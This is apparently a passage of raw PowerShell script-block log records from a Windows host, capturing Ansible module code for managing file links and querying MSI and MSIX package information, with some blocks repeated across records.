Encoding.Unicode.GetBytes(substituteName + "\0" + printName); char[] pathBuffer = Encoding.Unicode.GetChars(unicodeBytes); Array.Copy(pathBuffer, buffer.PathBuffer, pathBuffer.Length); UInt32 bytesReturned; if (!DeviceIoControl( fileHandle, FSCTL_SET_REPARSE_POINT, buffer, (UInt32)(buffer.ReparseDataLength + 8), IntPtr.Zero, 0, out bytesReturned, IntPtr.Zero)) throw new LinkUtilWin32Exception(String.Format("DeviceIoControl() failed to create junction point at {0} to {1}", linkPath, linkTarget)); } finally { fileHandle.Dispose(); } } } } '@ # FUTURE: find a better way to get the _ansible_remote_tmp variable $original_tmp = $env:TMP $original_lib = $env:LIB $remote_tmp = $original_tmp $module_params = Get-Variable -Name complex_args -ErrorAction SilentlyContinue if ($module_params) { if ($module_params.Value.ContainsKey("_ansible_remote_tmp") ) { $remote_tmp = $module_params.Value["_ansible_remote_tmp"] $remote_tmp = [System.Environment]::ExpandEnvironmentVariables($remote_tmp) } } $env:TMP = $remote_tmp $env:LIB = $null Add-Type -TypeDefinition $link_util $env:TMP = $original_tmp $env:LIB = $original_lib # enable the SeBackupPrivilege if it is disabled $state = Get-AnsiblePrivilege -Name SeBackupPrivilege if ($state -eq $false) { Set-AnsiblePrivilege -Name SeBackupPrivilege -Value $true } }ed579070-6fd9-49d3-b6fd-e57b8a5e5f94 4104132150x0154646Microsoft-Windows-PowerShell/OperationalEC2AMAZ-TJL6EBN11# Copyright (c) 2017 Ansible Project # Simplified BSD License (see licenses/simplified_bsd.txt or https://opensource.org/licenses/BSD-2-Clause) #Requires -Module Ansible.ModuleUtils.PrivilegeUtil Function Load-LinkUtils() { $link_util = @' using Microsoft.Win32.SafeHandles; using System; using System.Collections.Generic; using System.IO; using System.Runtime.InteropServices; using System.Text; namespace Ansible { public enum LinkType { SymbolicLink, JunctionPoint, HardLink } public class LinkUtilWin32Exception : System.ComponentModel.Win32Exception { private string _msg; public LinkUtilWin32Exception(string message) : this(Marshal.GetLastWin32Error(), message) { } public LinkUtilWin32Exception(int errorCode, string message) : base(errorCode) { _msg = String.Format("{0} ({1}, Win32ErrorCode {2})", message, base.Message, errorCode); } public override string Message { get { return _msg; } } public static explicit operator LinkUtilWin32Exception(string message) { return new LinkUtilWin32Exception(message); } } public class LinkInfo { public LinkType Type { get; internal set; } public string PrintName { get; internal set; } public string SubstituteName { get; internal set; } public string AbsolutePath { get; internal set; } public string TargetPath { get; internal set; } public string[] HardTargets { get; internal set; } } [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] public struct REPARSE_DATA_BUFFER { public UInt32 ReparseTag; public UInt16 ReparseDataLength; public UInt16 Reserved; public UInt16 SubstituteNameOffset; public UInt16 SubstituteNameLength; public UInt16 PrintNameOffset; public UInt16 PrintNameLength; [MarshalAs(UnmanagedType.ByValArray, SizeConst = LinkUtil.MAXIMUM_REPARSE_DATA_BUFFER_SIZE)] public char[] PathBuffer; } public class LinkUtil { public const int MAXIMUM_REPARSE_DATA_BUFFER_SIZE = 1024 * 16; private const UInt32 FILE_FLAG_BACKUP_SEMANTICS = 0x02000000; private const UInt32 FILE_FLAG_OPEN_REPARSE_POINT = 0x00200000; private const UInt32 FSCTL_GET_REPARSE_POINT = 0x000900A8; private const UInt32 FSCTL_SET_REPARSE_POINT = 0x000900A4; private const UInt32 FILE_DEVICE_FILE_SYSTEM = 0x00090000; private const UInt32 IO_REPARSE_TAG_MOUNT_POINT = 0xA0000003; private const UInt32 IO_REPARSE_TAG_SYMLINK = 0xA000000C; private const UInt32 SYMLINK_FLAG_RELATIVE = 0x00000001; private const Int64 INVALID_HANDLE_VALUE = -1; private const UInt32 SIZE_OF_WCHAR = 2; private const UInt32 SYMBOLIC_LINK_FLAG_FILE = 0x00000000; private const UInt32 SYMBOLIC_LINK_FLAG_DIRECTORY = 0x00000001; [DllImport("kernel32.dll", CharSet = CharSet.Auto)] private static extern SafeFileHandle CreateFile( string lpFileName, [MarshalAs(UnmanagedType.U4)] FileAccess dwDesiredAccess, [MarshalAs(UnmanagedType.U4)] FileShare dwShareMode, IntPtr lpSecurityAttributes, [MarshalAs(UnmanagedType.U4)] FileMode dwCreationDisposition, UInt32 dwFlagsAndAttributes, IntPtr hTemplateFile); // Used by GetReparsePointInfo() [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool DeviceIoControl( SafeFileHandle hDevice, UInt32 dwIoControlCode, IntPtr lpInBuffer, UInt32 nInBufferSize, out REPARSE_DATA_BUFFER lpOutBuffer, UInt32 nOutBufferSize, out UInt32 lpBytesReturned, IntPtr lpOverlapped); // Used by CreateJunctionPoint() [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool DeviceIoControl( SafeFileHandle hDevice, UInt32 dwIoControlCode, REPARSE_DATA_BUFFER lpInBuffer, UInt32 nInBufferSize, IntPtr lpOutBuffer, UInt32 nOutBufferSize, out UInt32 lpBytesReturned, IntPtr lpOverlapped); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool GetVolumePathName( string lpszFileName, StringBuilder lpszVolumePathName, ref UInt32 cchBufferLength); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern IntPtr FindFirstFileNameW( string lpFileName, UInt32 dwFlags, ref UInt32 StringLength, StringBuilder LinkName); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool FindNextFileNameW( IntPtr hFindStream, ref UInt32 StringLength, StringBuilder LinkName); [DllImport("kernel32.dll", SetLastError = true)] private static extern bool FindClose( IntPtr hFindFile); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool RemoveDirectory( string lpPathName); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool DeleteFile( string lpFileName); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool CreateSymbolicLink( string lpSymlinkFileName, string lpTargetFileName, UInt32 dwFlags); [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern bool CreateHardLink( string lpFileName, string lpExistingFileName, IntPtr lpSecurityAttributes); public static LinkInfo GetLinkInfo(string linkPath) { FileAttributes attr = File.GetAttributes(linkPath); if (attr.HasFlag(FileAttributes.ReparsePoint)) return GetReparsePointInfo(linkPath); if (!attr.HasFlag(FileAttributes.Directory)) return GetHardLinkInfo(linkPath); return null; } public static void DeleteLink(string linkPath) { bool success; FileAttributes attr = File.GetAttributes(linkPath); if (attr.HasFlag(FileAttributes.Directory)) { success = RemoveDirectory(linkPath); } else { success = DeleteFile(linkPath); } if (!success) throw new LinkUtilWin32Exception(String.Format("Failed to delete link at {0}", linkPath)); } public static void CreateLink(string linkPath, String linkTarget, LinkType linkType) { switch (linkType) { case LinkType.SymbolicLink: UInt32 linkFlags; FileAttributes attr = File.GetAttributes(linkTarget); if (attr.HasFlag(FileAttributes.Directory)) linkFlags = SYMBOLIC_LINK_FLAG_DIRECTORY; else linkFlags = SYMBOLIC_LINK_FLAG_FILE; if (!CreateSymbolicLink(linkPath, linkTarget, linkFlags)) throw new LinkUtilWin32Exception(String.Format("CreateSymbolicLink({0}, {1}, {2}) failed", linkPath, linkTarget, linkFlags)); break; case LinkType.JunctionPoint: CreateJunctionPoint(linkPath, linkTarget); break; case LinkType.HardLink: if (!CreateHardLink(linkPath, linkTarget, IntPtr.Zero)) throw new LinkUtilWin32Exception(String.Format("CreateHardLink({0}, {1}) failed", linkPath, linkTarget)); break; } } private static LinkInfo GetHardLinkInfo(string linkPath) { UInt32 maxPath = 260; List<string> result = new List<string>(); StringBuilder sb = new StringBuilder((int)maxPath); UInt32 stringLength = maxPath; if (!GetVolumePathName(linkPath, sb, ref stringLength)) throw new LinkUtilWin32Exception("GetVolumePathName() failed"); string volume = sb.ToString(); stringLength = maxPath; IntPtr findHandle = FindFirstFileNameW(linkPath, 0, ref stringLength, sb); if (findHandle.ToInt64() != INVALID_HANDLE_VALUE) { try { do { string hardLinkPath = sb.ToString(); if (hardLinkPath.StartsWith("\\")) hardLinkPath = hardLinkPath.Substring(1, hardLinkPath.Length - 1); result.Add(Path.Combine(volume, hardLinkPath)); stringLength = maxPath; } while (FindNextFileNameW(findHandle, ref stringLength, sb)); } finally { FindClose(findHandle); } } if (result.Count > 1) return new LinkInfo { Type = LinkType.HardLink, HardTargets = result.ToArray() }; return null; } private static LinkInfo GetReparsePointInfo(string linkPath) { SafeFileHandle fileHandle = CreateFile( linkPath, FileAccess.Read, FileShare.None, IntPtr.Zero, FileMode.Open, FILE_FLAG_OPEN_REPARSE_POINT | FILE_FLAG_BACKUP_SEMANTICS, IntPtr.Zero); if (fileHandle.IsInvalid) throw new LinkUtilWin32Exception(String.Format("CreateFile({0}) failed", linkPath)); REPARSE_DATA_BUFFER buffer = new REPARSE_DATA_BUFFER(); UInt32 bytesReturned; try { if (!DeviceIoControl( fileHandle, FSCTL_GET_REPARSE_POINT, IntPtr.Zero, 0, out buffer, MAXIMUM_REPARSE_DATA_BUFFER_SIZE, out bytesReturned, IntPtr.Zero)) throw new LinkUtilWin32Exception(String.Format("DeviceIoControl() failed for file at {0}", linkPath)); } finally { fileHandle.Dispose(); } bool isRelative = false; int pathOffset = 0; LinkType linkType; if (buffer.ReparseTag == IO_REPARSE_TAG_SYMLINK) { UInt32 bufferFlags = Convert.ToUInt32(buffer.PathBuffer[0]) + Convert.ToUInt32(buffer.PathBuffer[1]); if (bufferFlags == SYMLINK_FLAG_RELATIVE) isRelative = true; pathOffset = 2; linkType = LinkType.SymbolicLink; } else if (buffer.ReparseTag == IO_REPARSE_TAG_MOUNT_POINT) { linkType = LinkType.JunctionPoint; } else { string errorMessage = String.Format("Invalid Reparse Tag: {0}", buffer.ReparseTag.ToString()); throw new Exception(errorMessage); } string printName = new string(buffer.PathBuffer, (int)(buffer.PrintNameOffset / SIZE_OF_WCHAR) + pathOffset, (int)(buffer.PrintNameLength / SIZE_OF_WCHAR)); string substituteName = new string(buffer.PathBuffer, (int)(buffer.SubstituteNameOffset / SIZE_OF_WCHAR) + pathOffset, (int)(buffer.SubstituteNameLength / SIZE_OF_WCHAR)); // TODO: should we check for \?\UNC\server for convert it to the NT style \\server path // Remove the leading Windows object directory \?\ from the path if present string targetPath = substituteName; if (targetPath.StartsWith("\\??\\")) targetPath = targetPath.Substring(4, targetPath.Length - 4); string absolutePath = targetPath; if (isRelative) absolutePath = Path.GetFullPath(Path.Combine(new FileInfo(linkPath).Directory.FullName, targetPath)); return new LinkInfo { Type = linkType, PrintName = printName, SubstituteName = substituteName, AbsolutePath = absolutePath, TargetPath = targetPath }; } private static void CreateJunctionPoint(string linkPath, string linkTarget) { // We need to create the link as a dir beforehand Directory.CreateDirectory(linkPath); SafeFileHandle fileHandle = CreateFile( linkPath, FileAccess.Write, FileShare.Read | FileShare.Write | FileShare.None, IntPtr.Zero, FileMode.Open, FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT, IntPtr.Zero); if (fileHandle.IsInvalid) throw new LinkUtilWin32Exception(String.Format("CreateFile({0}) failed", linkPath)); try { string substituteName = "\\??\\" + Path.GetFullPath(linkTarget); string printName = linkTarget; REPARSE_DATA_BUFFER buffer = new REPARSE_DATA_BUFFER(); buffer.SubstituteNameOffset = 0; buffer.SubstituteNameLength = (UInt16)(substituteName.Length * SIZE_OF_WCHAR); buffer.PrintNameOffset = (UInt16)(buffer.SubstituteNameLength + 2); buffer.PrintNameLength = (UInt16)(printName.Length * SIZE_OF_WCHAR); buffer.ReparseTag = IO_REPARSE_TAG_MOUNT_POINT; buffer.ReparseDataLength = (UInt16)(buffer.SubstituteNameLength + buffer.PrintNameLength + 12); buffer.PathBuffer = new char[MAXIMUM_REPARSE_DATA_BUFFER_SIZE]; byte[] unicodeBytes = Encoding.Unicode.GetBytes(substituteName + "\0" + printName); char[] pathBuffer = Encoding.Unicode.GetChars(unicodeBytes); Array.Copy(pathBuffer, buffer.PathBuffer, pathBuffer.Length); UInt32 bytesReturned; if (!DeviceIoControl( fileHandle, FSCTL_SET_REPARSE_POINT, buffer, (UInt32)(buffer.ReparseDataLength + 8), IntPtr.Zero, 0, out bytesReturned, IntPtr.Zero)) throw new LinkUtilWin32Exception(String.Format("DeviceIoControl() failed to create junction point at {0} to {1}", linkPath, linkTarget)); } finally { fileHandle.Dispose(); } } } } '@ # FUTURE: find a better way to get the _ansible_remote_tmp variable $original_tmp = $env:TMP $original_lib = $env:LIB $remote_tmp = $original_tmp $module_params = Get-Variable -Name complex_args -ErrorAction SilentlyContinue if ($module_params) { if ($module_params.Value.ContainsKey("_ansible_remote_tmp") ) { $remote_tmp = $module_params.Value["_ansible_remote_tmp"] $remote_tmp = [System.Environment]::ExpandEnvironmentVariables($remote_tmp) } } $env:TMP = $remote_tmp $env:LIB = $null Add-Type -TypeDefinition $link_util $env:TMP = $original_tmp $env:LIB = $original_lib # enable the SeBackupPrivilege if it is disabled $state = Get-AnsiblePrivilege -Name SeBackupPrivilege if ($state -eq $false) { Set-AnsiblePrivilege -Name SeBackupPrivilege -Value $true } } Function Get-Link($link_path) { $link_info = [Ansible.LinkUtil]::GetLinkInfo($link_path) return $link_info } Function Remove-Link($link_path) { [Ansible.LinkUtil]::DeleteLink($link_path) } Function New-Link($link_path, $link_target, $link_type) { if (-not (Test-Path -LiteralPath $link_target)) { throw "link_target '$link_target' does not exist, cannot create link" } switch($link_type) { "link" { $type = [Ansible.LinkType]::SymbolicLink } "junction" { if (Test-Path -LiteralPath $link_target -PathType Leaf) { throw "cannot set the target for a junction point to a file" } $type = [Ansible.LinkType]::JunctionPoint } "hard" { if (Test-Path -LiteralPath $link_target -PathType Container) { throw "cannot set the target for a hard link to a directory" } $type = [Ansible.LinkType]::HardLink } default { throw "invalid link_type option $($link_type): expecting link, junction, hard" } } [Ansible.LinkUtil]::CreateLink($link_path, $link_target, $type) } # this line must stay at the bottom to ensure all defined module parts are exported Export-ModuleMember -Alias * -Function * -Cmdlet * 94e6ffda-6318-450d-ac90-361c7897aab0 4104152150x0149616Microsoft-Windows-PowerShell/OperationalEC2AMAZ-TJL6EBN11Function Import-PInvokeCode { param ( [Object] $Module ) Add-CSharpType -AnsibleModule $Module -References @' using Microsoft.Win32.SafeHandles; using System; using System.Collections.Generic; using System.ComponentModel; using System.Runtime.ConstrainedExecution; using System.Runtime.InteropServices; using System.Runtime.InteropServices.ComTypes; using System.Security.Principal; using System.Text; //AssemblyReference -Type System.Security.Principal.IdentityReference -CLR Core namespace Ansible.WinPackage { internal class NativeHelpers { [StructLayout(LayoutKind.Sequential)] public struct PACKAGE_VERSION { public UInt16 Revision; public UInt16 Build; public UInt16 Minor; public UInt16 Major; } [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] public struct PACKAGE_ID { public UInt32 reserved; public MsixArchitecture processorArchitecture; public PACKAGE_VERSION version; public string name; public string publisher; public string resourceId; public string publisherId; } } internal class NativeMethods { [DllImport("Ole32.dll", CharSet = CharSet.Unicode)] public static extern UInt32 GetClassFile( [MarshalAs(UnmanagedType.LPWStr)] string szFilename, ref Guid pclsid); [DllImport("Msi.dll")] public static extern UInt32 MsiCloseHandle( IntPtr hAny); [DllImport("Msi.dll", CharSet = CharSet.Unicode)] public static extern UInt32 MsiEnumPatchesExW( [MarshalAs(UnmanagedType.LPWStr)] string szProductCode, [MarshalAs(UnmanagedType.LPWStr)] string szUserSid, InstallContext dwContext, PatchState dwFilter, UInt32 dwIndex, StringBuilder szPatchCode, StringBuilder szTargetProductCode, out InstallContext pdwTargetProductContext, StringBuilder szTargetUserSid, ref UInt32 pcchTargetUserSid); [DllImport("Msi.dll", CharSet = CharSet.Unicode)] public static extern UInt32 MsiGetPatchInfoExW( [MarshalAs(UnmanagedType.LPWStr)] string szPatchCode, [MarshalAs(UnmanagedType.LPWStr)] string szProductCode, [MarshalAs(UnmanagedType.LPWStr)] string szUserSid, InstallContext dwContext, [MarshalAs(UnmanagedType.LPWStr)] string szProperty, StringBuilder lpValue, ref UInt32 pcchValue); [DllImport("Msi.dll", CharSet = CharSet.Unicode)] public static extern UInt32 MsiGetPropertyW( SafeMsiHandle hInstall, [MarshalAs(UnmanagedType.LPWStr)] string szName, StringBuilder szValueBuf, ref UInt32 pcchValueBuf); [DllImport("Msi.dll", CharSet = CharSet.Unicode)] public static extern UInt32 MsiGetSummaryInformationW( IntPtr hDatabase, [MarshalAs(UnmanagedType.LPWStr)] string szDatabasePath, UInt32 uiUpdateCount, out SafeMsiHandle phSummaryInfo); [DllImport("Msi.dll", CharSet = CharSet.Unicode)] public static extern UInt32 MsiOpenPackageExW( [MarshalAs(UnmanagedType.LPWStr)] string szPackagePath, UInt32 dwOptions, out SafeMsiHandle hProduct); [DllImport("Msi.dll", CharSet = CharSet.Unicode)] public static extern InstallState MsiQueryProductStateW( [MarshalAs(UnmanagedType.LPWStr)] string szProduct); [DllImport("Msi.dll", CharSet = CharSet.Unicode)] public static extern UInt32 MsiSummaryInfoGetPropertyW( SafeHandle hSummaryInfo, UInt32 uiProperty, out UInt32 puiDataType, out Int32 piValue, ref System.Runtime.InteropServices.ComTypes.FILETIME pftValue, StringBuilder szValueBuf, ref UInt32 pcchValueBuf); [DllImport("Kernel32.dll", CharSet = CharSet.Unicode)] public static extern UInt32 PackageFullNameFromId( NativeHelpers.PACKAGE_ID packageId, ref UInt32 packageFamilyNameLength, StringBuilder packageFamilyName); } [Flags] public enum InstallContext : uint { None = 0x00000000, UserManaged = 0x00000001, UserUnmanaged = 0x00000002, Machine = 0x00000004, AllUserManaged = 0x00000008, All = UserManaged | UserUnmanaged | Machine, } public enum InstallState : int { NotUsed = -7, BadConfig = -6, Incomplete = -5, SourceAbsent = -4, MoreData = -3, InvalidArg = -2, Unknown = -1, Broken = 0, Advertised = 1, Absent = 2, Local = 3, Source = 4, Default = 5, } public enum MsixArchitecture : uint { X86 = 0, Arm = 5, X64 = 9, Neutral = 11, Arm64 = 12, } [Flags] public enum PatchState : uint { Invalid = 0x00000000, Applied = 0x00000001, Superseded = 0x00000002, Obsoleted = 0x00000004, Registered = 0x00000008, All = Applied | Superseded | Obsoleted | Registered, } public class SafeMsiHandle : SafeHandleZeroOrMinusOneIsInvalid { public SafeMsiHandle() : base(true) { } [ReliabilityContract(Consistency.WillNotCorruptState, Cer.MayFail)] protected override bool ReleaseHandle() { UInt32 res = NativeMethods.MsiCloseHandle(handle); return res == 0; } } public class PatchInfo { public string PatchCode; public string ProductCode; public InstallContext Context; public SecurityIdentifier UserSid; } public class MsixHelper { public static string GetPackageFullName(string identity, string version, string publisher, MsixArchitecture architecture, string resourceId) { string[] versionSplit = version.Split(new char[] {'.'}, 4); NativeHelpers.PACKAGE_ID id = new NativeHelpers.PACKAGE_ID() { processorArchitecture = architecture, version = new NativeHelpers.PACKAGE_VERSION() { Revision = Convert.ToUInt16(versionSplit.Length > 3 ? versionSplit[3] : "0"), Build = Convert.ToUInt16(versionSplit.Length > 2 ? versionSplit[2] : "0"), Minor = Convert.ToUInt16(versionSplit.Length > 1 ? versionSplit[1] : "0"), Major = Convert.ToUInt16(versionSplit[0]), }, name = identity, publisher = publisher, resourceId = resourceId, }; UInt32 fullNameLength = 0; UInt32 res = NativeMethods.PackageFullNameFromId(id, ref fullNameLength, null); if (res != 122) // ERROR_INSUFFICIENT_BUFFER throw new Win32Exception((int)res); StringBuilder fullName = new StringBuilder((int)fullNameLength); res = NativeMethods.PackageFullNameFromId(id, ref fullNameLength, fullName); if (res != 0) throw new Win32Exception((int)res); return fullName.ToString(); } } public class MsiHelper { public static UInt32 SUMMARY_PID_TEMPLATE = 7; public static UInt32 SUMMARY_PID_REVNUMBER = 9; private static Guid MSI_CLSID = new Guid("000c1084-0000-0000-c000-000000000046"); private static Guid MSP_CLSID = new Guid("000c1086-0000-0000-c000-000000000046"); public static IEnumerable<PatchInfo> EnumPatches(string productCode, string userSid, InstallContext context, PatchState filter) { // PowerShell -> .NET, $null for a string parameter becomes an empty string, make sure we convert back. productCode = String.IsNullOrEmpty(productCode) ? null : productCode; userSid = String.IsNullOrEmpty(userSid) ? null : userSid; UInt32 idx = 0; while (true) { StringBuilder targetPatchCode = new StringBuilder(39); StringBuilder targetProductCode = new StringBuilder(39); InstallContext targetContext; StringBuilder targetUserSid = new StringBuilder(0); UInt32 targetUserSidLength = 0; UInt32 res = NativeMethods.MsiEnumPatchesExW(productCode, userSid, context, filter, idx, targetPatchCode, targetProductCode, out targetContext, targetUserSid, ref targetUserSidLength); SecurityIdentifier sid = null; if (res == 0x000000EA) // ERROR_MORE_DATA { targetUserSidLength++; targetUserSid.EnsureCapacity((int)targetUserSidLength); res = NativeMethods.MsiEnumPatchesExW(productCode, userSid, context, filter, idx, targetPatchCode, targetProductCode, out targetContext, targetUserSid, ref targetUserSidLength); sid = new SecurityIdentifier(targetUserSid.ToString()); } if (res == 0x00000103) // ERROR_NO_MORE_ITEMS break; else if (res != 0) throw new Win32Exception((int)res); yield return new PatchInfo() { PatchCode = targetPatchCode.ToString(), ProductCode = targetProductCode.ToString(), Context = targetContext, UserSid = sid, }; idx++; } } public static string GetPatchInfo(string patchCode, string productCode, string userSid, InstallContext context, string property) { // PowerShell -> .NET, $null for a string parameter becomes an empty string, make sure we convert back. userSid = String.IsNullOrEmpty(userSid) ? null : userSid; StringBuilder buffer = new StringBuilder(0); UInt32 bufferLength = 0; NativeMethods.MsiGetPatchInfoExW(patchCode, productCode, userSid, context, property, buffer, ref bufferLength); bufferLength++; buffer.EnsureCapacity((int)bufferLength); UInt32 res = NativeMethods.MsiGetPatchInfoExW(patchCode, productCode, userSid, context, property, buffer, ref bufferLength); if (res != 0) throw new Win32Exception((int)res); return buffer.ToString(); } public static string GetProperty(SafeMsiHandle productHandle, string property) { StringBuilder buffer = new StringBuilder(0); UInt32 bufferLength = 0; NativeMethods.MsiGetPropertyW(productHandle, property, buffer, ref bufferLength); // Make sure we include the null byte char at the end. bufferLength += 1; buffer.EnsureCapacity((int)bufferLength); UInt32 res = NativeMethods.MsiGetPropertyW(productHandle, property, buffer, ref bufferLength); if (res != 0) throw new Win32Exception((int)res); return buffer.ToString(); } public static SafeMsiHandle GetSummaryHandle(string databasePath) { SafeMsiHandle summaryInfo = null; UInt32 res = NativeMethods.MsiGetSummaryInformationW(IntPtr.Zero, databasePath, 0, out summaryInfo); if (res != 0) throw new Win32Exception((int)res); return summaryInfo; } public static string GetSummaryPropertyString(SafeMsiHandle summaryHandle, UInt32 propertyId) { UInt32 dataType = 0; Int32 intPropValue = 0; System.Runtime.InteropServices.ComTypes.FILETIME propertyFiletime = new System.Runtime.InteropServices.ComTypes.FILETIME(); StringBuilder buffer = new StringBuilder(0); UInt32 bufferLength = 0; NativeMethods.MsiSummaryInfoGetPropertyW(summaryHandle, propertyId, out dataType, out intPropValue, ref propertyFiletime, buffer, ref bufferLength); // Make sure we include the null byte char at the end. bufferLength += 1; buffer.EnsureCapacity((int)bufferLength); UInt32 res = NativeMethods.MsiSummaryInfoGetPropertyW(summaryHandle, propertyId, out dataType, out intPropValue, ref propertyFiletime, buffer, ref bufferLength); if (res != 0) throw new Win32Exception((int)res); return buffer.ToString(); } public static bool IsMsi(string filename) { return GetClsid(filename) == MSI_CLSID; } public static bool IsMsp(string filename) { return GetClsid(filename) == MSP_CLSID; } public static SafeMsiHandle OpenPackage(string packagePath, bool ignoreMachineState) { SafeMsiHandle packageHandle = null; UInt32 options = 0; if (ignoreMachineState) options |= 1; // MSIOPENPACKAGEFLAGS_IGNOREMACHINESTATE UInt32 res = NativeMethods.MsiOpenPackageExW(packagePath, options, out packageHandle); if (res != 0) throw new Win32Exception((int)res); return packageHandle; } public static InstallState QueryProductState(string productCode) { return NativeMethods.MsiQueryProductStateW(productCode); } private static Guid GetClsid(string filename) { Guid clsid = Guid.Empty; NativeMethods.GetClassFile(filename, ref clsid); return clsid; } } } '@ }2f25a5bb-734b-4a0f-af39-a34c0fd2466e 4104132150x0149605Microsoft-Windows-PowerShell/OperationalEC2AMAZ-TJL6EBN14#!powershell # Copyright: (c) 2014, Trond Hindenes <trond@hindenes.com>, and others # Copyright: (c) 2017, Ansible Project # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) # AccessToken should be removed once the username/password options are gone #AnsibleRequires -CSharpUtil Ansible.AccessToken #AnsibleRequires -CSharpUtil Ansible.Basic #Requires -Module Ansible.ModuleUtils.AddType #AnsibleRequires -PowerShell ..module_utils.Process #AnsibleRequires -PowerShell ..module_utils.WebRequest Function Import-PInvokeCode { param ( [Object] $Module ) Add-CSharpType -AnsibleModule $Module -References @' using Microsoft.Win32.SafeHandles; using System; using System.Collections.Generic; using System.ComponentModel; using System.Runtime.ConstrainedExecution; using System.Runtime.InteropServices; using System.Runtime.InteropServices.ComTypes; using System.Security.Principal; using System.Text; //AssemblyReference -Type System.Security.Principal.IdentityReference -CLR Core namespace Ansible.WinPackage { internal class NativeHelpers { [StructLayout(LayoutKind.Sequential)] public struct PACKAGE_VERSION { public UInt16 Revision; public UInt16 Build; public UInt16 Minor; public UInt16 Major; } [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] public struct PACKAGE_ID { public UInt32 reserved; public MsixArchitecture processorArchitecture; public PACKAGE_VERSION version; public string name; public string publisher; public string resourceId; public string publisherId; } } internal class NativeMethods { [DllImport("Ole32.dll", CharSet = CharSet.Unicode)] public static extern UInt32 GetClassFile( [MarshalAs(UnmanagedType.LPWStr)] string szFilename, ref Guid pclsid); [DllImport("Msi.dll")] public static extern UInt32 MsiCloseHandle( IntPtr hAny); [DllImport("Msi.dll", CharSet = CharSet.Unicode)] public static extern UInt32 MsiEnumPatchesExW( [MarshalAs(UnmanagedType.LPWStr)] string szProductCode, [MarshalAs(UnmanagedType.LPWStr)] string szUserSid, InstallContext dwContext, PatchState dwFilter, UInt32 dwIndex, StringBuilder szPatchCode, StringBuilder szTargetProductCode, out InstallContext pdwTargetProductContext, StringBuilder szTargetUserSid, ref UInt32 pcchTargetUserSid); [DllImport("Msi.dll", CharSet = CharSet.Unicode)] public static extern UInt32 MsiGetPatchInfoExW( [MarshalAs(UnmanagedType.LPWStr)] string szPatchCode, [MarshalAs(UnmanagedType.LPWStr)] string szProductCode, [MarshalAs(UnmanagedType.LPWStr)] string szUserSid, InstallContext dwContext, [MarshalAs(UnmanagedType.LPWStr)] string szProperty, StringBuilder lpValue, ref UInt32 pcchValue); [DllImport("Msi.dll", CharSet = CharSet.Unicode)] public static extern UInt32 MsiGetPropertyW( SafeMsiHandle hInstall, [MarshalAs(UnmanagedType.LPWStr)] string szName, StringBuilder szValueBuf, ref UInt32 pcchValueBuf); [DllImport("Msi.dll", CharSet = CharSet.Unicode)] public static extern UInt32 MsiGetSummaryInformationW( IntPtr hDatabase, [MarshalAs(UnmanagedType.LPWStr)] string szDatabasePath, UInt32 uiUpdateCount, out SafeMsiHandle phSummaryInfo); [DllImport("Msi.dll", CharSet = CharSet.Unicode)] public static extern UInt32 MsiOpenPackageExW( [MarshalAs(UnmanagedType.LPWStr)] string szPackagePath, UInt32 dwOptions, out SafeMsiHandle hProduct); [DllImport("Msi.dll", CharSet = CharSet.Unicode)] public static extern InstallState MsiQueryProductStateW( [MarshalAs(UnmanagedType.LPWStr)] string szProduct); [DllImport("Msi.dll", CharSet = CharSet.Unicode)] public static extern UInt32 MsiSummaryInfoGetPropertyW( SafeHandle hSummaryInfo, UInt32 uiProperty, out UInt32 puiDataType, out Int32 piValue, ref System.Runtime.InteropServices.ComTypes.FILETIME pftValue, StringBuilder szValueBuf, ref UInt32 pcchValueBuf); [DllImport("Kernel32.dll", CharSet = CharSet.Unicode)] public static extern UInt32 PackageFullNameFromId( NativeHelpers.PACKAGE_ID packageId, ref UInt32 packageFamilyNameLength, StringBuilder packageFamilyName); } [Flags] public enum InstallContext : uint { None = 0x00000000, UserManaged = 0x00000001, UserUnmanaged = 0x00000002, Machine = 0x00000004, AllUserManaged = 0x00000008, All = UserManaged | UserUnmanaged | Machine, } public enum InstallState : int { NotUsed = -7, BadConfig = -6, Incomplete = -5, SourceAbsent = -4, MoreData = -3, InvalidArg = -2, Unknown = -1, Broken = 0, Advertised = 1, Absent = 2, Local = 3, Source = 4, Default = 5, } public enum MsixArchitecture : uint { X86 = 0, Arm = 5, X64 = 9, Neutral = 11, Arm64 = 12, } [Flags] public enum PatchState : uint { Invalid = 0x00000000, Applied = 0x00000001, Superseded = 0x00000002, Obsoleted = 0x00000004, Registered = 0x00000008, All = Applied | Superseded | Obsoleted | Registered, } public class SafeMsiHandle : SafeHandleZeroOrMinusOneIsInvalid { public SafeMsiHandle() : base(true) { } [ReliabilityContract(Consistency.WillNotCorruptState, Cer.MayFail)] protected override bool ReleaseHandle() { UInt32 res = NativeMethods.MsiCloseHandle(handle); return res == 0; } } public class PatchInfo { public string PatchCode; public string ProductCode; public InstallContext Context; public SecurityIdentifier UserSid; } public class MsixHelper { public static string GetPackageFullName(string identity, string version, string publisher, MsixArchitecture architecture, string resourceId) { string[] versionSplit = version.Split(new char[] {'.'}, 4); NativeHelpers.PACKAGE_ID id = new NativeHelpers.PACKAGE_ID() { processorArchitecture = architecture, version = new NativeHelpers.PACKAGE_VERSION() { Revision = Convert.ToUInt16(versionSplit.Length > 3 ? versionSplit[3] : "0"), Build = Convert.ToUInt16(versionSplit.Length > 2 ? versionSplit[2] : "0"), Minor = Convert.ToUInt16(versionSplit.Length > 1 ? versionSplit[1] : "0"), Major = Convert.ToUInt16(versionSplit[0]), }, name = identity, publisher = publisher, resourceId = resourceId, }; UInt32 